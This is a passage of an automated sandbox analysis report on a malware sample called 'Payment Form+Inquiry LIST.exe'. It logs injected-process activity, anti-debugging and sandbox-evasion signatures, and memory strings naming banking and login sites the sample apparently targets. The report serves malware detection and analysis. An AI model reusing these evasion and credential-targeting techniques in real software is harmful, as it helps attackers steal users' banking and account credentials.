            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0041A763 push esi; iretd 3_2_0041A767
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051609AD push ecx; mov dword ptr [esp], ecx3_2_051609B6
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F1225F pushad ; ret 7_2_02F127F9
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F11344 push eax; iretd 7_2_02F11369
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F1B008 push es; iretd 7_2_02F1B009
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F127FA pushad ; ret 7_2_02F127F9
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F1283D push eax; iretd 7_2_02F12858
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F409AD push ecx; mov dword ptr [esp], ecx7_2_02F409B6
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F19939 push es; iretd 7_2_02F19940
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006E20DD push cs; ret 7_2_006E20DE
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006C4140 pushfd ; iretd 7_2_006C4157
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006C4135 pushfd ; iretd 7_2_006C4157
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006D711C push esi; iretd 7_2_006D7264
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006D7260 push esi; iretd 7_2_006D7264
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006D7247 push esi; iretd 7_2_006D7264
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006D737E push esp; iretd 7_2_006D737F
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006C73BF push ss; iretd 7_2_006C741E
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006DB3B4 push ss; ret 7_2_006DB3BA
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006D9889 push edx; iretd 7_2_006D988A
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006E0BB3 push cs; ret 7_2_006E0BB4
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF90818D324
            Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF90818D944
            Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF90818D504
            Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF90818D544
            Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF90818D1E4
            Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF908190154
            Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF90818DA44
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeMemory allocated: 2261D500000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051DD1C0 rdtsc 3_2_051DD1C0
            Source: C:\Windows\SysWOW64\findstr.exeWindow / User API: threadDelayed 4092Jump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeWindow / User API: threadDelayed 5881Jump to behavior
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-16136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeAPI coverage: 0.8 %
            Source: C:\Windows\SysWOW64\findstr.exeAPI coverage: 2.7 %
            Source: C:\Windows\SysWOW64\findstr.exe TID: 8012Thread sleep count: 4092 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\findstr.exe TID: 8012Thread sleep time: -8184000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exe TID: 8012Thread sleep count: 5881 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\findstr.exe TID: 8012Thread sleep time: -11762000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe TID: 8048Thread sleep time: -75000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe TID: 8048Thread sleep time: -34000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe TID: 8048Thread sleep time: -31500s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\findstr.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\findstr.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006DBF10 FindFirstFileW,FindNextFileW,FindClose,7_2_006DBF10
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 0_2_00007FF6E8262760 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessGroupAffinity,GetLastError,GetCurrentProcess,GetProcessAffinityMask,0_2_00007FF6E8262760
            Source: H0840I45.7.drBinary or memory string: dev.azure.comVMware20,11696497155j
            Source: H0840I45.7.drBinary or memory string: global block list test formVMware20,11696497155
            Source: H0840I45.7.drBinary or memory string: turbotax.intuit.comVMware20,11696497155t
            Source: findstr.exe, 00000007.00000002.3794278730.0000000007B94000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s.office.comVMware20,11696497155o
            Source: H0840I45.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
            Source: Payment Form+Inquiry LIST.exeBinary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
            Source: findstr.exe, 00000007.00000002.3794278730.0000000007B94000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: teractivebrokers.co.inVMware20,11696497155d
            Source: findstr.exe, 00000007.00000002.3794278730.0000000007B94000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rdVMware20,11696497155
            Source: findstr.exe, 00000007.00000002.3794278730.0000000007B94000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zure.comVMware20,11696497155j
            Source: H0840I45.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
            Source: QYzBgoBGBcxProZWs.exe, 00000009.00000002.3785992619.00000000011BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
            Source: H0840I45.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
            Source: H0840I45.7.drBinary or memory string: tasks.office.comVMware20,11696497155o
            Source: H0840I45.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
            Source: findstr.exe, 00000007.00000002.3794278730.0000000007B94000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,11696497155~
            Source: H0840I45.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
            Source: H0840I45.7.drBinary or memory string: bankofamerica.comVMware20,11696497155x
            Source: H0840I45.7.drBinary or memory string: ms.portal.azure.comVMware20,11696497155
            Source: H0840I45.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
            Source: findstr.exe, 00000007.00000002.3785973000.0000000002ABE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6
            Source: H0840I45.7.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
            Source: H0840I45.7.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
            Source: H0840I45.7.drBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
            Source: H0840I45.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
            Source: H0840I45.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
            Source: H0840I45.7.drBinary or memory string: interactivebrokers.comVMware20,11696497155
            Source: H0840I45.7.drBinary or memory string: AMC password management pageVMware20,11696497155
            Source: H0840I45.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
            Source: H0840I45.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
            Source: H0840I45.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
            Source: H0840I45.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
            Source: firefox.exe, 0000000A.00000002.1923618926.0000011A2F77C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllgg.
            Source: H0840I45.7.drBinary or memory string: discord.comVMware20,11696497155f
            Source: H0840I45.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
            Source: H0840I45.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
            Source: H0840I45.7.drBinary or memory string: outlook.office365.comVMware20,11696497155t
            Source: H0840I45.7.drBinary or memory string: outlook.office.comVMware20,11696497155s
            Source: H0840I45.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
            Source: H0840I45.7.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
            Source: H0840I45.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051DD1C0 rdtsc 3_2_051DD1C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_00417A33 LdrLoadDll,3_2_00417A33
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0520F525 mov eax, dword ptr fs:[00000030h]3_2_0520F525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0520F525 mov eax, dword ptr fs:[00000030h]3_2_0520F525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0520F525 mov eax, dword ptr fs:[00000030h]3_2_0520F525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0520F525 mov eax, dword ptr fs:[00000030h]3_2_0520F525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0520F525 mov eax, dword ptr fs:[00000030h]3_2_0520F525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0520F525 mov eax, dword ptr fs:[00000030h]3_2_0520F525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0520F525 mov eax, dword ptr fs:[00000030h]3_2_0520F525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0521B52F mov eax, dword ptr fs:[00000030h]3_2_0521B52F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05235537 mov eax, dword ptr fs:[00000030h]3_2_05235537
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05197505 mov eax, dword ptr fs:[00000030h]3_2_05197505
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05197505 mov ecx, dword ptr fs:[00000030h]3_2_05197505
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05170535 mov eax, dword ptr fs:[00000030h]3_2_05170535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05170535 mov eax, dword ptr fs:[00000030h]3_2_05170535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05170535 mov eax, dword ptr fs:[00000030h]3_2_05170535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05170535 mov eax, dword ptr fs:[00000030h]3_2_05170535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05170535 mov eax, dword ptr fs:[00000030h]3_2_05170535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05170535 mov eax, dword ptr fs:[00000030h]3_2_05170535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0516D534 mov eax, dword ptr fs:[00000030h]3_2_0516D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0516D534 mov eax, dword ptr fs:[00000030h]3_2_0516D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0516D534 mov eax, dword ptr fs:[00000030h]3_2_0516D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0516D534 mov eax, dword ptr fs:[00000030h]3_2_0516D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0516D534 mov eax, dword ptr fs:[00000030h]3_2_0516D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0516D534 mov eax, dword ptr fs:[00000030h]3_2_0516D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05234500 mov eax, dword ptr fs:[00000030h]3_2_05234500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05234500 mov eax, dword ptr fs:[00000030h]3_2_05234500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05234500 mov eax, dword ptr fs:[00000030h]3_2_05234500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05234500 mov eax, dword ptr fs:[00000030h]3_2_05234500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05234500 mov eax, dword ptr fs:[00000030h]3_2_05234500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05234500 mov eax, dword ptr fs:[00000030h]3_2_05234500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05234500 mov eax, dword ptr fs:[00000030h]3_2_05234500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518E53E mov eax, dword ptr fs:[00000030h]3_2_0518E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518E53E mov eax, dword ptr fs:[00000030h]3_2_0518E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518E53E mov eax, dword ptr fs:[00000030h]3_2_0518E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518E53E mov eax, dword ptr fs:[00000030h]3_2_0518E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518E53E mov eax, dword ptr fs:[00000030h]3_2_0518E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519D530 mov eax, dword ptr fs:[00000030h]3_2_0519D530
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519D530 mov eax, dword ptr fs:[00000030h]3_2_0519D530
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05168550 mov eax, dword ptr fs:[00000030h]3_2_05168550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05168550 mov eax, dword ptr fs:[00000030h]3_2_05168550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519B570 mov eax, dword ptr fs:[00000030h]3_2_0519B570
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519B570 mov eax, dword ptr fs:[00000030h]3_2_0519B570
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519656A mov eax, dword ptr fs:[00000030h]3_2_0519656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519656A mov eax, dword ptr fs:[00000030h]3_2_0519656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519656A mov eax, dword ptr fs:[00000030h]3_2_0519656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515B562 mov eax, dword ptr fs:[00000030h]3_2_0515B562
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519E59C mov eax, dword ptr fs:[00000030h]3_2_0519E59C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051EB594 mov eax, dword ptr fs:[00000030h]3_2_051EB594
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051EB594 mov eax, dword ptr fs:[00000030h]3_2_051EB594
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05194588 mov eax, dword ptr fs:[00000030h]3_2_05194588
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05162582 mov eax, dword ptr fs:[00000030h]3_2_05162582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05162582 mov ecx, dword ptr fs:[00000030h]3_2_05162582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515758F mov eax, dword ptr fs:[00000030h]3_2_0515758F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515758F mov eax, dword ptr fs:[00000030h]3_2_0515758F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515758F mov eax, dword ptr fs:[00000030h]3_2_0515758F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0521F5BE mov eax, dword ptr fs:[00000030h]3_2_0521F5BE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051F35BA mov eax, dword ptr fs:[00000030h]3_2_051F35BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051F35BA mov eax, dword ptr fs:[00000030h]3_2_051F35BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051F35BA mov eax, dword ptr fs:[00000030h]3_2_051F35BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051F35BA mov eax, dword ptr fs:[00000030h]3_2_051F35BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518F5B0 mov eax, dword ptr fs:[00000030h]3_2_0518F5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518F5B0 mov eax, dword ptr fs:[00000030h]3_2_0518F5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518F5B0 mov eax, dword ptr fs:[00000030h]3_2_0518F5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518F5B0 mov eax, dword ptr fs:[00000030h]3_2_0518F5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518F5B0 mov eax, dword ptr fs:[00000030h]3_2_0518F5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518F5B0 mov eax, dword ptr fs:[00000030h]3_2_0518F5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518F5B0 mov eax, dword ptr fs:[00000030h]3_2_0518F5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518F5B0 mov eax, dword ptr fs:[00000030h]3_2_0518F5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518F5B0 mov eax, dword ptr fs:[00000030h]3_2_0518F5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051845B1 mov eax, dword ptr fs:[00000030h]3_2_051845B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051845B1 mov eax, dword ptr fs:[00000030h]3_2_051845B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051815A9 mov eax, dword ptr fs:[00000030h]3_2_051815A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051815A9 mov eax, dword ptr fs:[00000030h]3_2_051815A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051815A9 mov eax, dword ptr fs:[00000030h]3_2_051815A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051815A9 mov eax, dword ptr fs:[00000030h]3_2_051815A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051815A9 mov eax, dword ptr fs:[00000030h]3_2_051815A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E05A7 mov eax, dword ptr fs:[00000030h]3_2_051E05A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E05A7 mov eax, dword ptr fs:[00000030h]3_2_051E05A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E05A7 mov eax, dword ptr fs:[00000030h]3_2_051E05A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051895DA mov eax, dword ptr fs:[00000030h]3_2_051895DA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051665D0 mov eax, dword ptr fs:[00000030h]3_2_051665D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519A5D0 mov eax, dword ptr fs:[00000030h]3_2_0519A5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519A5D0 mov eax, dword ptr fs:[00000030h]3_2_0519A5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051DD5D0 mov eax, dword ptr fs:[00000030h]3_2_051DD5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051DD5D0 mov ecx, dword ptr fs:[00000030h]3_2_051DD5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519E5CF mov eax, dword ptr fs:[00000030h]3_2_0519E5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519E5CF mov eax, dword ptr fs:[00000030h]3_2_0519E5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051955C0 mov eax, dword ptr fs:[00000030h]3_2_051955C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052355C9 mov eax, dword ptr fs:[00000030h]3_2_052355C9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051815F4 mov eax, dword ptr fs:[00000030h]3_2_051815F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051815F4 mov eax, dword ptr fs:[00000030h]3_2_051815F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051815F4 mov eax, dword ptr fs:[00000030h]3_2_051815F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051815F4 mov eax, dword ptr fs:[00000030h]3_2_051815F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051815F4 mov eax, dword ptr fs:[00000030h]3_2_051815F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051815F4 mov eax, dword ptr fs:[00000030h]3_2_051815F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052335D7 mov eax, dword ptr fs:[00000030h]3_2_052335D7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052335D7 mov eax, dword ptr fs:[00000030h]3_2_052335D7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052335D7 mov eax, dword ptr fs:[00000030h]3_2_052335D7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519C5ED mov eax, dword ptr fs:[00000030h]3_2_0519C5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519C5ED mov eax, dword ptr fs:[00000030h]3_2_0519C5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051625E0 mov eax, dword ptr fs:[00000030h]3_2_051625E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518E5E7 mov eax, dword ptr fs:[00000030h]3_2_0518E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518E5E7 mov eax, dword ptr fs:[00000030h]3_2_0518E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518E5E7 mov eax, dword ptr fs:[00000030h]3_2_0518E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518E5E7 mov eax, dword ptr fs:[00000030h]3_2_0518E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518E5E7 mov eax, dword ptr fs:[00000030h]3_2_0518E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518E5E7 mov eax, dword ptr fs:[00000030h]3_2_0518E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518E5E7 mov eax, dword ptr fs:[00000030h]3_2_0518E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518E5E7 mov eax, dword ptr fs:[00000030h]3_2_0518E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518340D mov eax, dword ptr fs:[00000030h]3_2_0518340D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05198402 mov eax, dword ptr fs:[00000030h]3_2_05198402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05198402 mov eax, dword ptr fs:[00000030h]3_2_05198402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05198402 mov eax, dword ptr fs:[00000030h]3_2_05198402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519A430 mov eax, dword ptr fs:[00000030h]3_2_0519A430
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515C427 mov eax, dword ptr fs:[00000030h]3_2_0515C427
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515E420 mov eax, dword ptr fs:[00000030h]3_2_0515E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515E420 mov eax, dword ptr fs:[00000030h]3_2_0515E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515E420 mov eax, dword ptr fs:[00000030h]3_2_0515E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518245A mov eax, dword ptr fs:[00000030h]3_2_0518245A
